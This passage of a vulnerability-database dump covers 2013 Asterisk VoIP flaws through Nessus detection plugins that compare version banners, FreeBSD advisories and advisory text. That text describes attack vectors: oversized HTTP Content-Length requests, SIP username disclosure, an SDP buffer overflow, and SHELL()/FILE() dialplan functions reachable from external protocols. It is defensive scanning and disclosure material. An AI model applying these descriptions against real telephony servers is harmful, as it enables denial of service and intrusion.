\n value:\n\"The Asterisk Development Team has announced security releases for\nCertified Asterisk 1.8.15 and Asterisk 1.8, 10, and 11. The available\nsecurity releases are released as versions 1.8.15-cert2, 1.8.20.2,\n10.12.2, 10.12.2-digiumphones, and 11.2.2.\n\nThese releases are available for immediate download at\nhttp://downloads.asterisk.org/pub/telephony/asterisk/releases\n\nThe release of these versions resolve the following issues :\n\n - A possible buffer overflow during H.264 format\n negotiation. The format attribute resource for H.264\n video performs an unsafe read against a media attribute\n when parsing the SDP.\n\n This vulnerability only affected Asterisk 11.\n\n - A denial of service exists in Asterisk's HTTP server.\n AST-2012-014, fixed in January of this year, contained a\n fix for Asterisk's HTTP server for a remotely-triggered\n crash. While the fix prevented the crash from being\n triggered, a denial of service vector still exists with\n that solution if an attacker sends one or more HTTP POST\n requests with very large Content-Length values.\n\n This vulnerability affects Certified Asterisk 1.8.15,\n Asterisk 1.8, 10, and 11\n\n - A potential username disclosure exists in the SIP\n channel driver. When authenticating a SIP request with\n alwaysauthreject enabled, allowguest disabled, and\n autocreatepeer disabled, Asterisk discloses whether a\n user exists for INVITE, SUBSCRIBE, and REGISTER\n transactions in multiple ways.\n\n This vulnerability affects Certified Asterisk 1.8.15,\n Asterisk 1.8, 10, and 11\n\nThese issues and their resolutions are described in the security\nadvisories.\n\nFor more information about the details of these vulnerabilities,\nplease read security advisories AST-2013-001, AST-2013-002, and\nAST-2013-003, which were released at the same time as this\nannouncement.\n\nFor a full list of changes in the current releases, please see the\nChangeLogs :\n\nhttp://downloads.asterisk.org/pub/telephony/certified-asterisk/release\ns/ChangeLog-1.8.15-cert2\nhttp://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLo\ng-1.8.20.2\nhttp://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLo\ng-10.12.2\nhttp://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLo\ng-10.12.2-digiumphones\nhttp://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLo\ng-11.2.2\n\nThe security advisories are available at :\n\n -\n http://downloads.asterisk.org/pub/security/AST-2013-001.\n pdf\n\n -\n http://downloads.asterisk.org/pub/security/AST-2013-00\n 2.pdf\n\n -\n http://downloads.asterisk.org/pub/security/AST-2013-00\n 3.pdf\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/security/AST-2013-001.pdf\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/security/AST-2013-002.pdf\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/security/AST-2013-003.pdf\"\n );\n # http://downloads.asterisk.org/pub/telephony/asterisk/releases\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/telephony/asterisk/releases/\"\n );\n # http://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLog-1.8.20.2\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?29e5303b\"\n );\n # http://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLog-10.12.2\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a4695ab6\"\n );\n # http://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLog-10.12.2-digiumphones\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?05ab7e1a\"\n );\n # http://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLog-11.2.2\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?16e35cb0\"\n );\n # http://downloads.asterisk.org/pub/telephony/certified-asterisk/releases/ChangeLog-1.8.15-cert2\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d97a0e84\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=928550\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-April/101614.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?dcf63440\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected asterisk package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:18\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/04/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/04/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^18([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 18.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC18\", reference:\"asterisk-11.2.2-1.fc18\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"asterisk\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:45:25", "description": "According to the version in its SIP banner, the version of Asterisk running on the remote host is potentially affected by a username disclosure vulnerability related to INVITE, SUBSCRIBE and REGISTER transactions and improper settings for the configuration options 'alwaysauthreject', 'allowguest' and 'autocreatepeer'.", "cvss3": {}, "published": "2013-04-10T00:00:00", "type": "nessus", "title": "Asterisk SIP Channel Driver Username Disclosure (AST-2013-003)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2264"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:digium:asterisk"], "id": "ASTERISK_AST_2013_003.NASL", "href": "https://www.tenable.com/plugins/nessus/65898", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(65898);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-2264\");\n script_bugtraq_id(58764);\n\n script_name(english:\"Asterisk SIP Channel Driver Username Disclosure (AST-2013-003)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A telephony application running on the remote host is affected by an \ninformation disclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version in its SIP banner, the version of Asterisk\nrunning on the remote host is potentially affected by a username\ndisclosure vulnerability related to INVITE, SUBSCRIBE and REGISTER\ntransactions and improper settings for the configuration options\n'alwaysauthreject', 'allowguest' and 'autocreatepeer'.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2013-003.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://issues.asterisk.org/jira/browse/ASTERISK-21013\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Asterisk 1.8.20.2 / 10.12.2 / 11.2.2 / Certified Asterisk\n1.8.15-cert2 / Asterisk Business Edition C.3.8.1, or apply the\nappropriate patch listed in the Asterisk advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/04/10\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:digium:asterisk\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"asterisk_detection.nasl\");\n script_require_keys(\"asterisk/sip_detected\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"asterisk/sip_detected\");\n\n# see if we were able to get version info from the Asterisk SIP services\nasterisk_kbs = get_kb_list(\"sip/asterisk/*/version\");\nif (isnull(asterisk_kbs)) exit(1, \"Could not obtain any version information from the Asterisk SIP instance(s).\");\n\n# Prevent potential false positives.\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nis_vuln = FALSE;\nnot_vuln_installs = make_list();\nerrors = make_list();\n\nforeach kb_name (keys(asterisk_kbs))\n{\n vulnerable = 0;\n\n matches = eregmatch(pattern:\"/(udp|tcp)/([0-9]+)/version\", string:kb_name);\n if (isnull(matches))\n {\n errors = make_list(errors, \"Unexpected error parsing port number from '\"+kb_name+\"'.\");\n continue;\n }\n\n proto = matches[1];\n port = matches[2];\n version = asterisk_kbs[kb_name];\n\n if (version == 'unknown')\n {\n errors = make_list(errors, \"Unable to obtain version of install on \" + proto + \"/\" + port + \".\");\n continue;\n }\n\n banner = get_kb_item(\"sip/asterisk/\" + proto + \"/\" + port + \"/source\");\n if (!banner)\n {\n # We have version but banner is missing; log error\n # and use in version-check though.\n errors = make_list(errors, \"KB item 'sip/asterisk/\" + proto + \"/\" + port + \"/source' is missing.\");\n banner = 'unknown';\n }\n\n # Open Source 10x < 10.12.2\n if (version =~ \"^10([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n fixed = \"10.12.2\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Open Source 11x < 11.2.2\n if (version =~ \"^11([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n fixed = \"11.2.2\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Open Source 1.8.x < 1.8.20.2\n if (version =~ \"^1\\.8([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n fixed = \"1.8.20.2\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Asterisk Certified 1.8.15-cert1\n if (version =~ \"^1\\.8\\.15([^0-9]|$)\" && \"cert\" >< tolower(version))\n {\n fixed = \"1.8.15-cert2\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Business Edition C.3.x < C.3.8.1\n # Check granularity first\n if (version =~ \"^C(\\.3(\\.8)?)?$\")\n {\n errors = make_list(errors, \"The version, \" + version + \" is not granular enough to make a determination.\");\n continue;\n }\n # Now check version\n if (version =~ \"^C\\.3\\.([0-7]|8\\.0)([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n fixed = \"C.3.8.1\";\n vulnerable = -1;\n }\n\n if (vulnerable < 0)\n {\n is_vuln = TRUE;\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : ' + banner +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed + '\\n';\n security_warning(port:port, proto:proto, extra:report);\n }\n else security_warning(port:port, proto:proto);\n }\n else not_vuln_installs = make_list(not_vuln_installs, version + \" on port \" + proto + \"/\" + port);\n}\n\nif (max_index(errors))\n{\n if (max_index(errors) == 1) errmsg = errors[0];\n else errmsg = 'Errors were encountered verifying installs : \\n ' + join(errors, sep:'\\n ');\n\n exit(1, errmsg);\n}\nelse\n{\n installs = max_index(not_vuln_installs);\n if (installs == 0)\n {\n if (is_vuln)\n exit(0);\n else\n audit(AUDIT_NOT_INST, \"Asterisk\");\n }\n else if (installs == 1) audit(AUDIT_INST_VER_NOT_VULN, \"Asterisk \" + not_vuln_installs[0]);\n else exit(0, \"The Asterisk installs (\" + join(not_vuln_installs, sep:\", \") + \") are not affected.\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T14:45:44", "description": "According to the version in its SIP banner, the version of Asterisk running on the remote host is potentially affected by a denial of service vulnerability related to HTTP POST requests with very large Content-Length header values.", "cvss3": {}, "published": "2013-04-10T00:00:00", "type": "nessus", "title": "Asterisk HTTP Content-Length Header DoS (AST-2013-002)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2686"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:digium:asterisk"], "id": "ASTERISK_AST_2013_002.NASL", "href": "https://www.tenable.com/plugins/nessus/65897", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(65897);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-2686\");\n script_bugtraq_id(58756);\n\n script_name(english:\"Asterisk HTTP Content-Length Header DoS (AST-2013-002)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A telephony application running on the remote host is affected by a\ndenial of service vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version in its SIP banner, the version of Asterisk\nrunning on the remote host is potentially affected by a denial of\nservice vulnerability related to HTTP POST requests with very large\nContent-Length header values.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2013-002.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://issues.asterisk.org/jira/browse/ASTERISK-20967\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Asterisk 1.8.20.2 / 10.12.2 / 11.2.2 / Certified Asterisk\n1.8.15-cert2, or apply the patch listed in the Asterisk advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/04/10\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:digium:asterisk\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"asterisk_detection.nasl\");\n script_require_keys(\"asterisk/sip_detected\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"asterisk/sip_detected\");\n\n# see if we were able to get version info from the Asterisk SIP services\nasterisk_kbs = get_kb_list(\"sip/asterisk/*/version\");\nif (isnull(asterisk_kbs)) exit(1, \"Could not obtain any version information from the Asterisk SIP instance(s).\");\n\n# Prevent potential false positives.\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nis_vuln = FALSE;\nnot_vuln_installs = make_list();\nerrors = make_list();\n\nforeach kb_name (keys(asterisk_kbs))\n{\n vulnerable = 0;\n\n matches = eregmatch(pattern:\"/(udp|tcp)/([0-9]+)/version\", string:kb_name);\n if (isnull(matches))\n {\n errors = make_list(errors, \"Unexpected error parsing port number from '\"+kb_name+\"'.\");\n continue;\n }\n\n proto = matches[1];\n port = matches[2];\n version = asterisk_kbs[kb_name];\n\n if (version == 'unknown')\n {\n errors = make_list(errors, \"Unable to obtain version of install on \" + proto + \"/\" + port + \".\");\n continue;\n }\n\n banner = get_kb_item(\"sip/asterisk/\" + proto + \"/\" + port + \"/source\");\n if (!banner)\n {\n # We have version but banner is missing; log error\n # and use in version-check though.\n errors = make_list(errors, \"KB item 'sip/asterisk/\" + proto + \"/\" + port + \"/source' is missing.\");\n banner = 'unknown';\n }\n\n # Open Source 10x < 10.12.2\n if (version =~ \"^10([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n fixed = \"10.12.2\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Open Source 11x < 11.2.2\n if (version =~ \"^11([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n fixed = \"11.2.2\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Open Source 1.8.x < 1.8.20.2\n if (version =~ \"^1\\.8([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n fixed = \"1.8.20.2\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Asterisk Certified 1.8.15-cert1\n if (version =~ \"^1\\.8\\.15([^0-9]|$)\" && \"cert\" >< tolower(version))\n {\n fixed = \"1.8.15-cert2\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n if (vulnerable < 0)\n {\n is_vuln = TRUE;\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : ' + banner +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed + '\\n';\n security_warning(port:port, proto:proto, extra:report);\n }\n else security_warning(port:port, proto:proto);\n }\n else not_vuln_installs = make_list(not_vuln_installs, version + \" on port \" + proto + \"/\" + port);\n}\n\nif (max_index(errors))\n{\n if (max_index(errors) == 1) errmsg = errors[0];\n else errmsg = 'Errors were encountered verifying installs : \\n ' + join(errors, sep:'\\n ');\n\n exit(1, errmsg);\n}\nelse\n{\n installs = max_index(not_vuln_installs);\n if (installs == 0)\n {\n if (is_vuln)\n exit(0);\n else\n audit(AUDIT_NOT_INST, \"Asterisk\");\n }\n else if (installs == 1) audit(AUDIT_INST_VER_NOT_VULN, \"Asterisk \" + not_vuln_installs[0]);\n else exit(0, \"The Asterisk installs (\" + join(not_vuln_installs, sep:\", \") + \") are not affected.\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:33", "description": "\n\nAsterisk project reports:\n\nBuffer Overflow Exploit Through SIP SDP Header\nUsername disclosure in SIP channel driver\nDenial of Service in HTTP server\n\n\n", "cvss3": {}, "published": "2013-03-27T00:00:00", "type": "freebsd", "title": "asterisk -- multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2264", "CVE-2013-2685", "CVE-2013-2686"], "modified": "2013-03-27T00:00:00", "id": "DAF0A339-9850-11E2-879E-D43D7E0C7C02", "href": "https://vuxml.freebsd.org/freebsd/daf0a339-9850-11e2-879e-d43d7e0c7c02.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-19T15:51:32", "description": "\n\nThe Asterisk project reports:\n\nRemote Crash From Late Arriving SIP ACK With SDP\nRemote Crash when Invalid SDP is sent in SIP Request\n\n\n", "cvss3": {}, "published": "2013-08-27T00:00:00", "type": "freebsd", "title": "asterisk -- multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2013-08-29T00:00:00", "id": "FD2BF3B5-1001-11E3-BA94-0025905A4771", "href": "https://vuxml.freebsd.org/freebsd/fd2bf3b5-1001-11e3-ba94-0025905a4771.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-01-19T15:51:33", "description": "\n\nAsterisk project reports:\n\nCrashes due to large stack allocations when using TCP\nDenial of Service Through Exploitation of Device State Caching\n\n\n", "cvss3": {}, "published": "2013-01-02T00:00:00", "type": "freebsd", "title": "asterisk -- multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977"], "modified": "2013-01-02T00:00:00", "id": "F7C87A8A-55D5-11E2-A255-C8600054B392", "href": "https://vuxml.freebsd.org/freebsd/f7c87a8a-55d5-11e2-a255-c8600054b392.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-01-19T15:51:32", "description": "\n\nThe Asterisk project reports:\n\nA 16 bit SMS message that contains an odd message length value will\n\t cause the message decoding loop to run forever. The message buffer is\n\t not on the stack but will be overflowed resulting in corrupted memory\n\t and an immediate crash.\nExternal control protocols, such as the Asterisk Manager Interface,\n\t often have the ability to get and set channel variables; this allows\n\t the execution of dialplan functions. Dialplan functions within\n\t Asterisk are incredibly powerful, which is wonderful for building\n\t applications using Asterisk. But during the read or write execution,\n\t certain diaplan functions do much more. For example, reading the SHELL()\n\t function can execute arbitrary commands on the system Asterisk is\n\t running on. Writing to the FILE() function can change any file that\n\t Asterisk has write access to. When these functions are executed from an\n\t external protocol, that execution could result in a privilege escalation.\n\n\n", "cvss3": {}, "published": "2013-12-16T00:00:00", "type": "freebsd", "title": "asterisk -- multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7100"], "modified": "2013-12-16T00:00:00", "id": "0C39BAFC-6771-11E3-868F-0025905A4771", "href": "https://vuxml.freebsd.org/freebsd/0c39bafc-6771-11e3-868f-0025905a4771.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "securityvulns": [{"lastseen": "2021-06-08T18:47:32", "description": "SIP information disclosure and buffer overflow, HTTP DoS.", "edition": 2, "cvss3": {}, "published": "2013-04-01T00:00:00", "type": "securityvulns", "title": "Asterisk multiple security vulnerabilities", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2264", "CVE-2013-2685", "CVE-2013-2686"], "modified": "2013-04-01T00:00:00", "id": "SECURITYVULNS:VULN:12974", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12974", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-06-08T18:47:32", "description": "DoS conditions caused by resources exhaustion.", "edition": 2, "cvss3": {}, "published": "2013-01-05T00:00:00", "type": "securityvulns", "title": "Asterisk security vulnerabilities", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977"], "modified": "2013-01-05T00:00:00", "id": "SECURITYVULNS:VULN:12811", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12811", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:46", "description": "\r\n\r\n Asterisk Project Security Advisory - AST-2012-015\r\n\r\n Product Asterisk \r\n Summary Denial of Service Through Exploitation of Device \r\n State Caching \r\n Nature of Advisory Denial of Service \r\n Susceptibility Remote Unauthenticated Sessions \r\n Severity Critical \r\n Exploits Known None \r\n Reported On 26 July, 2012 \r\n Reported By Russell Bryant \r\n Posted On 2 January, 2013 \r\n Last Updated On January 2, 2013 \r\n Advisory Contact Matt Jordan <mjordan AT digium DOT com> \r\n CVE Name CVE-2012-5977 \r\n\r\n Description Asterisk maintains an internal cache for devices. The \r\n device state cache holds the state of each device known to \r\n Asterisk, such that consumers of device state information \r\n can query for the last known state for a particular device, \r\n even if it is not part of 